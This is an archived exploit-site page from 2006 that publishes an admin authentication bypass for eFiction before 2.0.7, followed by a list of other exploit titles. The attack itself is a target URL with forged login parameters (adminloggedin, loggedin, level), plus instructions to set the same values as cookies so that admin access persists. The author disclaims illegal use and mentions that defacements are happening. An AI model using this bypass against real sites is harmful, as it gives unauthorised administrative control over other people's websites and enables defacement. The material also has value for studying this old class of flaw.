exploits , vulnerabilities , articles , eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

2006-08-25

eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

Rated as : High Risk

##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also
illegally defacing 
these websites under MY name, which is a shame because they ripped it from
a private discussion 
on g00ns.net. This proof of concept is not to be used to illegally hack
websites. I do not condone, 
nor act in this type of activity. I suggest whomever is defacing websites
under my name stop, 
since you would gain more notorioty under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use firefox's extension "add n edit cookies" to add these to
your cookies so they stick. 
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays
with each page)


securitydot.net - 2006-08-25

Exploits - newest 10 RSS | More

2007-06-15 38444 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23885 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit